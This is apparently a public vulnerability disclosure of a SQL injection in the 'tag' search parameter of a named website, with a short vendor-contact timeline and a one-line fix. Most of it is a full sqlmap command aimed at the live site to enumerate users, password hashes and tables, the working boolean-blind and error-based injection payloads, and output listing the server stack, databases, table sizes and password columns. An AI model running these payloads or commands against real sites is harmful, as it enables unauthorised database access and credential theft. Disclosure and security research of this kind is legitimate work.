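2016-04-13: Actively contacting the vendor and waiting for the vendor to claim the report; details are not public.
2016-05-28: The vendor has actively ignored the vulnerability; details are disclosed to the public.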
RT
$ python sqlmap.py -u "http://www.ehs360.com/search.php?tag=+%E5%91%BC%E5%90%B8%E5%99%A8" -p tag --technique=BE --output-dir=output --random-agent --batch --no-cast --current-user --is-dba --users --passwords --count --search -C pass
---
Parameter: tag (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tag= %E5%91%BC%E5%90%B8%E5%99%A8%' AND 7092=7092 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tag= %E5%91%BC%E5%90%B8%E5%99%A8%' AND (SELECT 4599 FROM(SELECT COUNT(*),CONCAT(0x7171787a71,(SELECT (ELT(4599=4599,1))),0x7178787071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.2.8
back-end DBMS: MySQL 5.0
current user: 'ehs360.com@localhost'
current user is DBA: False
database management system users [1]:
[*] 'ehs360.com'@'localhost'

Database: information_schema
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| COLUMNS                               | 588     |
| GLOBAL_STATUS                         | 291     |
| SESSION_STATUS                        | 291     |
| GLOBAL_VARIABLES                      | 272     |
| SESSION_VARIABLES                     | 272     |
| COLLATION_CHARACTER_SET_APPLICABILITY | 128     |
| COLLATIONS                            | 127     |
| PARTITIONS                            | 52      |
| TABLES                                | 52      |
| CHARACTER_SETS                        | 36      |
| SCHEMA_PRIVILEGES                     | 36      |
| KEY_COLUMN_USAGE                      | 22      |
| STATISTICS                            | 22      |
| TABLE_CONSTRAINTS                     | 22      |
| PLUGINS                               | 10      |
| ENGINES                               | 8       |
| SCHEMATA                              | 3       |
| PROCESSLIST                           | 1       |
| USER_PRIVILEGES                       | 1       |
+---------------------------------------+---------+

Database: ehs360.com
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ehse_promodel                         | 8985    |
| ehse_attachment                       | 6690    |
| ehse_pro                              | 4904    |
| ehse_article                          | 1230    |
| ehse_protype                          | 596     |
| ehse_manage                           | 2       |
| ehse_gbook                            | 1       |
+---------------------------------------+---------+

Database: ehs360.com_2010
+---------------------------------------+---------+
| Table                                 | Entries |
+---------------------------------------+---------+
| ehse_promodel                         | 8975    |
| ehse_pro_has_tag                      | 8482    |
| ehse_attachment                       | 6033    |
| ehse_pro                              | 4447    |
| ehse_article                          | 1203    |
| ehse_pro0                             | 871     |
| ehse_protype                          | 544     |
| ehse_protag                           | 413     |
| ehse_gbook                            | 35      |
| ehse_inquiry                          | 21      |
| ehse_member                           | 15      |
| ehse_page                             | 12      |
| ehse_config                           | 11      |
| ehse_articletype                      | 2       |
| ehse_manage                           | 2       |
+---------------------------------------+---------+

columns LIKE 'pass' were found in the following databases:
Database: ehs360.com_2010
Table: ehse_member
[1 column]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| password | varchar(255) |
+----------+--------------+

Database: ehs360.com_2010
Table: ehse_manage
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+

Database: ehs360.com
Table: ehse_manage
[1 column]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(32) |
+----------+-------------+
Filter the input.
Unable to contact the vendor, or the vendor actively refused.
Vulnerability Rank: 15 (WooYun rating)